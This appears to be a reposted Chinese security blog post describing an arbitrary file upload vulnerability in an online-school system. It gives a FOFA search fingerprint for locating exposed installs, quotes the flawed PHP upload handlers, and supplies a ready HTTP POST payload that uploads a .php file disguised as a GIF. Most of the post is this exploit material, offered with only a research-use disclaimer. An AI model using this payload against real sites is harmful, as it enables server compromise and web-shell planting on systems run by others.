0x01 前言
fofa:"/static/libs/common/jquery.stickyNavbar.min.js"
他们官网最新版3.0.0 直接能下载源码.
0x02 漏洞
位于 /api/controller/Appuser.php: 文件中的 upImage 函数存在缺陷 可导致任意文件上传
/*** 上传头像*/function upImage(){$data = model('system')->where('name', 'upload_image')->find();$upload=unserialize($data['value']);$param = $this->request->param();$exename = $this->getExeName($_FILES['file']['name']);$tmp_name=$_FILES['file']['tmp_name'];if($upload['location']==1){if(!empty($_FILES['file'])){if($exename != 'png' && $exename != 'jpg' && $exename != 'gif'){$res['code']=1;$res['msg']='不允许的扩展名';return json_encode($res) ;}$temp= uniqid().'.'.$exename;$imageSavePath ='./upload/avatar/'. $temp;if(move_uploaded_file($tmp_name, $imageSavePath)){$res['code']=0;$res['imageSavePath']='/upload/avatar/'. $temp;return json_encode($res) ;}}}else{try {$file = $this->request->file('file');$temp= uniqid().'.'.$exename;$ossClient=controller('api/uploader')->new_oss();$ossClient->uploadFile(config('Bucket'), 'files'.$param['uid'].'/avatar/'.$temp,$file->getInfo()['tmp_name']);$url='//'.config('Bucket').'.'.config('EndPoint').'/'.'files'.$param['uid'].'/avatar/'.$temp;$res['code']=0;$res['imageSavePath']=$url;return json_encode($res) ;} catch (Exception $e) {return json_encode(['code' => 1, 'msg' => $e->getMessage()]);}}
上边的上传限制不用管 其实走的下边的 api/uploader 接口 /api/controller/Uploader.php:
/*** 上传图片到本地*/public function uploadImage(){try {$file = $this->request->file('file');$info = $file->move(ROOT_PATH . 'public' . DS . 'upload' . DS . 'image');if ($info) {$upload_image = unserialize(config('upload_image'));if ($upload_image['is_thumb'] == 1 || $upload_image['is_water'] == 1 || $upload_image['is_text'] == 1) {$object_image = thinkImage::open($info->getPathName());// 图片压缩if ($upload_image['is_thumb'] == 1) {$object_image->thumb($upload_image['max_width'], $upload_image['max_height']);}// 图片水印if ($upload_image['is_water'] == 1) {$object_image->water(ROOT_PATH . trim($upload_image['water_source'], '/'), $upload_image['water_locate'], $upload_image['water_alpha']);}// 文本水印if ($upload_image['is_text'] == 1) {$font = !empty($upload_image['text_font']) ? trim($upload_image['text_font'], '/') : 'vendor/topthink/think-captcha/assets/zhttfs/1.ttf';$object_image->text($upload_image['text'], ROOT_PATH . $font, $upload_image['text_size'], $upload_image['text_color'], $upload_image['text_locate'], $upload_image['text_offset'], $upload_image['text_angle']);}$object_image->save($info->getPathName());}return ['code' => 1, 'url' => '/upload/image/' . str_replace('\', '/', $info->getSaveName())];} else {return ['code' => 0, 'msg' => $file->getError()];}} catch (Exception $e) {return ['code' => 0, 'msg' => $e->getMessage()];}}
如上述代码 文件传到 /upload/imge/ 目录下 Payload:
POST /api/uploader/uploadImage HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9mx-requested-with: XMLHttpRequest------WebKitFormBoundaryLZbmKeasWgo2gPtUContent-Disposition: form-data; name="file"; filename="1G3311040N.php"Content-Type: image/gifphpinfo();------WebKitFormBoundaryLZbmKeasWgo2gPtU--
原文始发于微信公众号(星悦安全):某网校系统任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论